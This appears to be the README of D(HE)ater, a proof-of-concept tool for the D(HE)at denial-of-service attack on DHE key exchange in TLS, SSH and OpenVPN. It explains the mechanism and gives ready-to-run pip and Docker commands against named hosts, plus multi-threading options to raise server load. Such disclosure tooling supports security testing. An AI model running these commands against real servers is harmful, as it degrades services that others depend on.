Summary

D(HE)ater is the proof-of-concept implementation of the D(HE)at attack (CVE-2002-20001). It is basically an attacking tool based on CPU heating in that it forces CPU intensive operations of the ephemeral variant of the Diffie-Hellman key exchange (DHE) in given cryptography protocols (e.g. TLS, OpenVPN, SSH).

The CPU intensive operation (modular exponentiation) is performed twice (ephemeral public key generation, shared key calculation) during the DHE key exchange. D(HE)ater enforces the server to generate its DHE public key and event to calculate the shared without generating cryptographically correct ephemeral private/public keypir on the client-side. It means that there is no calculation cost on the client’s side, however there is a significant amount of calculation cost on the server-side. Based on this, a denial-of-service attack (DoS) can be initiated.

Usage

D(HE)ater can be installed directly via pip from PyPi

pip install dheater
dheat --protocol tls ecc256.badssl.com
dheat --protocol ssh ecc256.badssl.com

or can be used via Docker from Docker Hub

docker pull coroner/dheater
docker run --tty --rm coroner/dheater --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --protocol ssh ecc256.badssl.com

You can increase load by string extra threads.

dheat --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --thread-num 4 --protocol ssh ecc256.badssl.com

Credits

The implementation is powered by CryptoLyzer, a server cryptographic protocol ( TLS, SSL, SSH, DNSSEC) setting analyzer.